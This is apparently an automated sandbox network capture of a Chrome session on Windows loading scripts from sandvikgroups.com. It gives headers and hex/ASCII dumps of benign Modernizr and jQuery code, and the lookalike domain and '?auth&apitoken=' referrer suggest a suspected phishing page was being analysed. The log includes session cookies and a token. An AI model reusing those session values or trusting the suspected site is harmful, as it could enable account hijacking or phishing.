                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YMnMQX5Y4TcL0Ioc64kj5grrctpQ%2FTVBL1tDtV%2BB6N2pL%2FWEwlu2lAfz6BPtf2OOt8MFVaiIn4TFjmcsEoEg1%2FNQh2fYaCv9EayGugGhrUFGRanLFrEerV3rr5gLT%2FHQ6yujHMvP"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                        Strict-Transport-Security: max-age=15780000
                                        Server: cloudflare
                                        CF-RAY: 8fe6e94e1f220f81-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2025-01-07 21:06:23 UTC406INData Raw: 32 62 34 63 0d 0a 77 69 6e 64 6f 77 2e 4d 6f 64 65 72 6e 69 7a 72 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 66 75 6e 63 74 69 6f 6e 20 72 28 65 29 7b 62 2e 63 73 73 54 65 78 74 3d 65 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 72 28 53 2e 6a 6f 69 6e 28 65 2b 22 3b 22 29 2b 28 74 7c 7c 22 22 29 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 65 3d 3d 3d 74 7d 66 75 6e 63 74 69 6f 6e 20 69 28 65 2c 74 29 7b 72 65 74 75 72 6e 21 21 7e 28 22 22 2b 65 29 2e 69 6e 64 65 78 4f 66 28 74 29 7d 66 75 6e 63 74 69 6f 6e 20 63 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 72 20 69 6e 20 65 29 7b 76 61 72 20 6f 3d 65 5b 72 5d 3b 69 66 28 21 69 28 6f 2c 22 2d 22 29 26 26 62 5b 6f 5d 21 3d
                                        Data Ascii: 2b4cwindow.Modernizr=function(e,t,n){function r(e){b.cssText=e}function o(e,t){return r(S.join(e+";")+(t||""))}function a(e,t){return typeof e===t}function i(e,t){return!!~(""+e).indexOf(t)}function c(e,t){for(var r in e){var o=e[r];if(!i(o,"-")&&b[o]!=
                                        2025-01-07 21:06:23 UTC1369INData Raw: 63 74 69 6f 6e 20 75 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 65 2e 63 68 61 72 41 74 28 30 29 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 2b 65 2e 73 6c 69 63 65 28 31 29 2c 6f 3d 28 65 2b 22 20 22 2b 6b 2e 6a 6f 69 6e 28 72 2b 22 20 22 29 2b 72 29 2e 73 70 6c 69 74 28 22 20 22 29 3b 72 65 74 75 72 6e 20 61 28 74 2c 22 73 74 72 69 6e 67 22 29 7c 7c 61 28 74 2c 22 75 6e 64 65 66 69 6e 65 64 22 29 3f 63 28 6f 2c 74 29 3a 28 6f 3d 28 65 2b 22 20 22 2b 54 2e 6a 6f 69 6e 28 72 2b 22 20 22 29 2b 72 29 2e 73 70 6c 69 74 28 22 20 22 29 2c 73 28 6f 2c 74 2c 6e 29 29 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 29 7b 70 2e 69 6e 70 75 74 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 2c 6f 3d 6e 2e 6c 65 6e 67 74 68 3b 6f 3e 72 3b 72 2b 2b 29 6a 5b
                                        Data Ascii: ction u(e,t,n){var r=e.charAt(0).toUpperCase()+e.slice(1),o=(e+" "+k.join(r+" ")+r).split(" ");return a(t,"string")||a(t,"undefined")?c(o,t):(o=(e+" "+T.join(r+" ")+r).split(" "),s(o,t,n))}function l(){p.input=function(n){for(var r=0,o=n.length;o>r;r++)j[
                                        2025-01-07 21:06:23 UTC1369INData Raw: 46 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 72 2c 6f 29 7b 76 61 72 20 61 2c 69 2c 63 2c 73 2c 75 3d 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 2c 6c 3d 74 2e 62 6f 64 79 2c 64 3d 6c 7c 7c 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 62 6f 64 79 22 29 3b 69 66 28 70 61 72 73 65 49 6e 74 28 72 2c 31 30 29 29 66 6f 72 28 3b 72 2d 2d 3b 29 63 3d 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 2c 63 2e 69 64 3d 6f 3f 6f 5b 72 5d 3a 76 2b 28 72 2b 31 29 2c 75 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 63 29 3b 72 65 74 75 72 6e 20 61 3d 5b 22 26 23 31 37 33 3b 22 2c 27 3c 73 74 79 6c 65 20 69 64 3d 22 73 27 2c 76 2c 27 22 3e 27 2c 65 2c 22 3c 2f 73 74 79 6c 65 3e 22 5d 2e 6a 6f 69 6e 28 22 22 29 2c 75 2e 69 64 3d 76
                                        Data Ascii: F=function(e,n,r,o){var a,i,c,s,u=t.createElement("div"),l=t.body,d=l||t.createElement("body");if(parseInt(r,10))for(;r--;)c=t.createElement("div"),c.id=o?o[r]:v+(r+1),u.appendChild(c);return a=["&#173;",'<style id="s',v,'">',e,"</style>"].join(""),u.id=v
                                        2025-01-07 21:06:23 UTC1369INData Raw: 28 65 29 7b 76 61 72 20 74 3d 74 68 69 73 3b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 21 3d 74 79 70 65 6f 66 20 74 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 3b 76 61 72 20 6e 3d 44 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 2c 31 29 2c 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 74 68 69 73 20 69 6e 73 74 61 6e 63 65 6f 66 20 72 29 7b 76 61 72 20 6f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 6f 2e 70 72 6f 74 6f 74 79 70 65 3d 74 2e 70 72 6f 74 6f 74 79 70 65 3b 76 61 72 20 61 3d 6e 65 77 20 6f 2c 69 3d 74 2e 61 70 70 6c 79 28 61 2c 6e 2e 63 6f 6e 63 61 74 28 44 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 29 29 29 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 28 69 29 3d 3d 3d 69 3f 69 3a 61 7d 72 65 74 75 72 6e 20 74 2e 61 70 70 6c 79
                                        Data Ascii: (e){var t=this;if("function"!=typeof t)throw new TypeError;var n=D.call(arguments,1),r=function(){if(this instanceof r){var o=function(){};o.prototype=t.prototype;var a=new o,i=t.apply(a,n.concat(D.call(arguments)));return Object(i)===i?i:a}return t.apply
                                        2025-01-07 21:06:23 UTC1369INData Raw: 74 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 22 57 65 62 53 6f 63 6b 65 74 22 69 6e 20 65 7c 7c 22 4d 6f 7a 57 65 62 53 6f 63 6b 65 74 22 69 6e 20 65 7d 2c 4d 2e 72 67 62 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 28 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 31 35 30 2c 32 35 35 2c 31 35 30 2c 2e 35 29 22 29 2c 69 28 62 2e 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 2c 22 72 67 62 61 22 29 7d 2c 4d 2e 68 73 6c 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 28 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 68 73 6c 61 28 31 32 30 2c 34 30 25 2c 31 30 30 25 2c 2e 35 29 22 29 2c 69 28 62 2e 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 2c 22 72 67 62 61 22 29 7c 7c 69 28 62
                                        Data Ascii: ts=function(){return"WebSocket"in e||"MozWebSocket"in e},M.rgba=function(){return r("background-color:rgba(150,255,150,.5)"),i(b.backgroundColor,"rgba")},M.hsla=function(){return r("background-color:hsla(120,40%,100%,.5)"),i(b.backgroundColor,"rgba")||i(b
                                        2025-01-07 21:06:23 UTC1369INData Raw: 74 2d 74 72 61 6e 73 66 6f 72 6d 2d 33 64 29 7b 23 6d 6f 64 65 72 6e 69 7a 72 7b 6c 65 66 74 3a 39 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 68 65 69 67 68 74 3a 33 70 78 3b 7d 7d 22 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 65 3d 39 3d 3d 3d 74 2e 6f 66 66 73 65 74 4c 65 66 74 26 26 33 3d 3d 3d 74 2e 6f 66 66 73 65 74 48 65 69 67 68 74 7d 29 2c 65 7d 2c 4d 2e 63 73 73 74 72 61 6e 73 69 74 69 6f 6e 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 75 28 22 74 72 61 6e 73 69 74 69 6f 6e 22 29 7d 2c 4d 2e 66 6f 6e 74 66 61 63 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3b 72 65 74 75 72 6e 20 46 28 27 40 66 6f 6e 74 2d 66 61 63 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 66 6f 6e 74 22 3b 73 72 63 3a 75 72 6c 28 22
                                        Data Ascii: t-transform-3d){#modernizr{left:9px;position:absolute;height:3px;}}",function(t){e=9===t.offsetLeft&&3===t.offsetHeight}),e},M.csstransitions=function(){return u("transition")},M.fontface=function(){var e;return F('@font-face {font-family:"font";src:url("
                                        2025-01-07 21:06:23 UTC1369INData Raw: 7d 2c 4d 2e 6c 6f 63 61 6c 73 74 6f 72 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 76 2c 76 29 2c 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 72 65 6d 6f 76 65 49 74 65 6d 28 76 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 2c 4d 2e 73 65 73 73 69 6f 6e 73 74 6f 72 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 76 2c 76 29 2c 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 72 65 6d 6f 76 65 49 74 65 6d 28 76 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 2c 4d 2e 77 65 62 77 6f 72 6b 65 72 73 3d 66 75 6e 63 74 69 6f 6e
                                        Data Ascii: },M.localstorage=function(){try{return localStorage.setItem(v,v),localStorage.removeItem(v),!0}catch(e){return!1}},M.sessionstorage=function(){try{return sessionStorage.setItem(v,v),sessionStorage.removeItem(v),!0}catch(e){return!1}},M.webworkers=function
                                        2025-01-07 21:06:23 UTC1369INData Raw: 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 3f 65 2e 73 70 6c 69 74 28 22 20 22 29 3a 65 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29 7b 76 61 72 20 74 3d 76 5b 65 5b 68 5d 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 67 2b 2b 2c 65 5b 68 5d 3d 67 2c 76 5b 67 5d 3d 74 29 2c 74 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 6e 2c 72 29 7b 69 66 28 6e 7c 7c 28 6e 3d 74 29 2c 6c 29 72 65 74 75 72 6e 20 6e 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 65 29 3b 72 7c 7c 28 72 3d 6f 28 6e 29 29 3b 76 61 72 20 61 3b 72 65 74 75 72 6e 20 61 3d 72 2e 63 61 63 68 65 5b 65 5d 3f 72 2e 63 61 63 68 65 5b 65 5d 2e 63 6c 6f 6e 65 4e 6f 64 65 28 29 3a 70 2e 74 65 73 74 28 65 29 3f 28 72 2e 63 61 63 68 65 5b 65 5d 3d 72 2e 63 72 65 61 74 65 45 6c 65 6d 28 65 29 29 2e
                                        Data Ascii: tring"==typeof e?e.split(" "):e}function o(e){var t=v[e[h]];return t||(t={},g++,e[h]=g,v[g]=t),t}function a(e,n,r){if(n||(n=t),l)return n.createElement(e);r||(r=o(n));var a;return a=r.cache[e]?r.cache[e].cloneNode():p.test(e)?(r.cache[e]=r.createElem(e)).
                                        2025-01-07 21:06:23 UTC1103INData Raw: 61 6e 7c 73 74 72 6f 6e 67 7c 73 74 79 6c 65 7c 74 61 62 6c 65 7c 74 62 6f 64 79 7c 74 64 7c 74 68 7c 74 72 7c 75 6c 29 24 2f 69 2c 68 3d 22 5f 68 74 6d 6c 35 73 68 69 76 22 2c 67 3d 30 2c 76 3d 7b 7d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 61 22 29 3b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 78 79 7a 3e 3c 2f 78 79 7a 3e 22 2c 75 3d 22 68 69 64 64 65 6e 22 69 6e 20 65 2c 6c 3d 31 3d 3d 65 2e 63 68 69 6c 64 4e 6f 64 65 73 2e 6c 65 6e 67 74 68 7c 7c 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 61 22 29 3b 76 61 72 20 65 3d 74 2e 63 72 65 61 74 65 44 6f 63 75 6d 65 6e 74 46 72 61 67 6d 65 6e 74 28 29 3b 72 65 74 75 72 6e 22 75 6e 64 65 66
                                        Data Ascii: an|strong|style|table|tbody|td|th|tr|ul)$/i,h="_html5shiv",g=0,v={};!function(){try{var e=t.createElement("a");e.innerHTML="<xyz></xyz>",u="hidden"in e,l=1==e.childNodes.length||function(){t.createElement("a");var e=t.createDocumentFragment();return"undef
                                        2025-01-07 21:06:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        41192.168.2.449808188.114.96.34435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 21:06:23 UTC1832OUTGET /?get_link=ch_files/lib/js/jquery-3.3.1.min.js HTTP/1.1
                                        Host: sandvikgroups.com
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-arch: "x86"
                                        sec-ch-ua-full-version: "117.0.5938.132"
                                        sec-ch-ua-platform-version: "10.0.0"
                                        sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                        sec-ch-ua-bitness: "64"
                                        sec-ch-ua-model: ""
                                        sec-ch-ua-platform: "Windows"
                                        Accept: */*
                                        Sec-Fetch-Site: same-origin
                                        Sec-Fetch-Mode: no-cors
                                        Sec-Fetch-Dest: script
                                        Referer: https://sandvikgroups.com/?auth&apitoken=qrd0fg2hx9ez7rr
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        Cookie: cf_clearance=QM.MuetOShSYHUUxhvhqs8aE1tL0MSRSQdvVjfAEaaw-1736283956-1.2.1.1-ObYB.GVCdQwIutt9keZWdlW2OQPyI4jxD0b0VbSfU9Jtg08Q1Q_TS5p5jQru14FMfWGDNtbuahqWXbbNyHp_B0G79CjpmYBMMHTnSLHSqcOVYbCPzWrh5.h1dGG40P9OEY3cwNFW4SK1tQS_FIW..tNEt5CTmWv_UIQfNfhA9h1jX_7V4ggBxwXqaNp7JFd8jQ10qkWn6sAA2Ghd0kViYwPRr1QYJp4QGBEasr7Nbj5N7uUBvjEeXS_VliYSinJHh_t7FhKbW0S6D8ZKoTVpmdHqYtUpnVPtwiquH7dtfSowpG6_Mw5PjVAz7m3kXY8iSHSYBggvaVcsRJvTwyEAn6Wd0iZXLvIHyMAviJqzsjgCczOZwAj2agCz9U..YSiXu.e9SG2avYw1.tBX26vJQm72lA8CW_MUCGUuNHA..rhphR7el16l4ogfU9oQpol9; D7mJajRrTIUttfS2mEgvf1VX5yw=O_gwvhCcnX3CzFMPBaC6iuRuni4; a5smlNWZyQwMGE4rSwQDLY5XUrU=1736283973; 7WJ8eGztMSEV5f_BGht9hYAoijE=1736370373; KrlJOS-eE775YgYm2hpDZUkRTvc=fR4OZEkZ7f7DAJRlbnf-BnRcdyI; Z28TCGgyksAyn9w8pqGVpkcW9DU=24V5fd_SqGfynCsHmAJbl9ySndA; 2vr6FJpXLImaYDnK6ye90Ul8Pls=1736283976; qP8z4g21VQWXI8KiIvcj2au0iXk=1736370376; vXuI3jpYYO0XVdaNbL1zCBWkGQQ=uEfxLxDx4TmObmcF6RTOrtYCeIc; PHPSESSID=ac667dfa18e02e513ed41eabccae044c
                                        2025-01-07 21:06:23 UTC1283INHTTP/1.1 200 OK
                                        Date: Tue, 07 Jan 2025 21:06:23 GMT
                                        Content-Type: application/javascript
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Vary: Accept-Encoding
                                        X-Content-Type-Options: nosniff
                                        X-Content-Type-Options: nosniff
                                        X-XSS-Protection: 1; mode=block
                                        X-XSS-Protection: 1; mode=block
                                        Cache-Control: max-age=315360000, stale-while-revalidate=315360000, stale-if-error=315360000, public, immutable
                                        Cache-Control: max-age=0, private, no-cache, no-store, must-revalidate
                                        Pragma: public
                                        Pragma: no-cache
                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                        X-Nginx-Upstream-Cache-Status: BYPASS
                                        X-Server-Powered-By: Engintron
                                        CF-Cache-Status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ULPOUZGjYWzfTOKuorPoKcTkFTDMpgmO0f6KdxFL1WO8C7JOw%2F4l9OLBS5clsWOhJ6AzJGcNgnRXpb6DczlpOph775%2BvWoFKK%2Bs%2Fhf%2BwH81C0EyKLnP0XwJXN3%2FfiVh0F2sXYA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8fe6e950dd1d7cf4-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        server-timing: cfL4;desc="?proto=TCP&rtt=1997&min_rtt=1976&rtt_var=783&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2843&recv_bytes=2410&delivery_rate=1360037&cwnd=217&unsent_bytes=0&cid=349c772261610367&ts=526&x=0"
                                        2025-01-07 21:06:23 UTC86INData Raw: 33 32 34 32 0d 0a 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73
                                        Data Ascii: 3242/*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/licens
                                        2025-01-07 21:06:23 UTC1369INData Raw: 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72 65 71 75 69 72 65 73 20 61 20 77 69 6e 64 6f 77 20 77 69 74 68 20 61 20 64 6f 63 75 6d 65 6e 74 22 29 3b 72 65 74 75 72 6e 20 74 28 65 29 7d 3a 74 28 65 29 7d 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f
                                        Data Ascii: e */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof windo
                                        2025-01-07 21:06:23 UTC1369INData Raw: 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 6f 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 29 7d 2c 66 69 72 73 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 71 28 30 29 7d 2c 6c 61 73 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 71 28 2d 31 29 7d 2c 65 71 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 6c 65 6e 67 74 68 2c 6e 3d 2b 65 2b 28 65 3c 30 3f 74 3a 30 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 6e 3e 3d 30 26 26 6e 3c 74 3f 5b 74 68 69 73 5b 6e 5d 5d 3a 5b 5d 29 7d 2c 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 72 65 76 4f 62 6a 65 63 74 7c 7c 74 68 69 73 2e 63 6f
                                        Data Ascii: this.pushStack(o.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.co
                                        2025-01-07 21:06:23 UTC1369INData Raw: 2c 74 29 7b 76 61 72 20 6e 3d 74 7c 7c 5b 5d 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 65 26 26 28 43 28 4f 62 6a 65 63 74 28 65 29 29 3f 77 2e 6d 65 72 67 65 28 6e 2c 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 3f 5b 65 5d 3a 65 29 3a 73 2e 63 61 6c 6c 28 6e 2c 65 29 29 2c 6e 7d 2c 69 6e 41 72 72 61 79 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 74 3f 2d 31 3a 75 2e 63 61 6c 6c 28 74 2c 65 2c 6e 29 7d 2c 6d 65 72 67 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 2b 74 2e 6c 65 6e 67 74 68 2c 72 3d 30 2c 69 3d 65 2e 6c 65 6e 67 74 68 3b 72 3c 6e 3b 72 2b 2b 29 65 5b 69 2b 2b 5d 3d 74 5b 72 5d 3b 72 65 74 75 72 6e 20 65 2e 6c 65 6e 67 74 68 3d 69 2c 65 7d 2c 67 72 65 70
                                        Data Ascii: ,t){var n=t||[];return null!=e&&(C(Object(e))?w.merge(n,"string"==typeof e?[e]:e):s.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:u.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep
                                        2025-01-07 21:06:23 UTC1369INData Raw: 5c 5c 78 61 30 5d 29 2b 22 2c 49 3d 22 5c 5c 5b 22 2b 4d 2b 22 2a 28 22 2b 52 2b 22 29 28 3f 3a 22 2b 4d 2b 22 2a 28 5b 2a 5e 24 7c 21 7e 5d 3f 3d 29 22 2b 4d 2b 22 2a 28 3f 3a 27 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 27 5d 29 2a 29 27 7c 5c 22 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 5c 22 5d 29 2a 29 5c 22 7c 28 22 2b 52 2b 22 29 29 7c 29 22 2b 4d 2b 22 2a 5c 5c 5d 22 2c 57 3d 22 3a 28 22 2b 52 2b 22 29 28 3f 3a 5c 5c 28 28 28 27 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 27 5d 29 2a 29 27 7c 5c 22 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 5c 22 5d 29 2a 29 5c 22 29 7c 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 28 29 5b 5c 5c 5d 5d 7c 22 2b 49 2b 22 29 2a 29 7c 2e 2a 29 5c 5c 29 7c 29 22 2c 24 3d 6e 65 77 20 52 65 67 45
                                        Data Ascii: \\xa0])+",I="\\["+M+"*("+R+")(?:"+M+"*([*^$|!~]?=)"+M+"*(?:'((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\"|("+R+"))|)"+M+"*\\]",W=":("+R+")(?:\\((('((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\")|((?:\\\\.|[^\\\\()[\\]]|"+I+")*)|.*)\\)|)",$=new RegE
                                        2025-01-07 21:06:23 UTC1369INData Raw: 22 3a 65 2e 73 6c 69 63 65 28 30 2c 2d 31 29 2b 22 5c 5c 22 2b 65 2e 63 68 61 72 43 6f 64 65 41 74 28 65 2e 6c 65 6e 67 74 68 2d 31 29 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 2b 22 20 22 3a 22 5c 5c 22 2b 65 7d 2c 72 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 70 28 29 7d 2c 69 65 3d 6d 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 30 3d 3d 3d 65 2e 64 69 73 61 62 6c 65 64 26 26 28 22 66 6f 72 6d 22 69 6e 20 65 7c 7c 22 6c 61 62 65 6c 22 69 6e 20 65 29 7d 2c 7b 64 69 72 3a 22 70 61 72 65 6e 74 4e 6f 64 65 22 2c 6e 65 78 74 3a 22 6c 65 67 65 6e 64 22 7d 29 3b 74 72 79 7b 4c 2e 61 70 70 6c 79 28 41 3d 48 2e 63 61 6c 6c 28 77 2e 63 68 69 6c 64 4e 6f 64 65 73 29 2c 77 2e 63 68 69 6c 64 4e 6f 64 65 73 29 2c 41 5b 77 2e 63 68 69 6c 64 4e 6f 64 65 73
                                        Data Ascii: ":e.slice(0,-1)+"\\"+e.charCodeAt(e.length-1).toString(16)+" ":"\\"+e},re=function(){p()},ie=me(function(e){return!0===e.disabled&&("form"in e||"label"in e)},{dir:"parentNode",next:"legend"});try{L.apply(A=H.call(w.childNodes),w.childNodes),A[w.childNodes
                                        2025-01-07 21:06:23 UTC1369INData Raw: 6f 6e 20 61 65 28 29 7b 76 61 72 20 65 3d 5b 5d 3b 66 75 6e 63 74 69 6f 6e 20 74 28 6e 2c 69 29 7b 72 65 74 75 72 6e 20 65 2e 70 75 73 68 28 6e 2b 22 20 22 29 3e 72 2e 63 61 63 68 65 4c 65 6e 67 74 68 26 26 64 65 6c 65 74 65 20 74 5b 65 2e 73 68 69 66 74 28 29 5d 2c 74 5b 6e 2b 22 20 22 5d 3d 69 7d 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 73 65 28 65 29 7b 72 65 74 75 72 6e 20 65 5b 62 5d 3d 21 30 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 75 65 28 65 29 7b 76 61 72 20 74 3d 64 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 66 69 65 6c 64 73 65 74 22 29 3b 74 72 79 7b 72 65 74 75 72 6e 21 21 65 28 74 29 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 66 69 6e 61 6c 6c 79 7b 74 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 74 2e 70 61 72 65 6e 74
                                        Data Ascii: on ae(){var e=[];function t(n,i){return e.push(n+" ")>r.cacheLength&&delete t[e.shift()],t[n+" "]=i}return t}function se(e){return e[b]=!0,e}function ue(e){var t=d.createElement("fieldset");try{return!!e(t)}catch(e){return!1}finally{t.parentNode&&t.parent
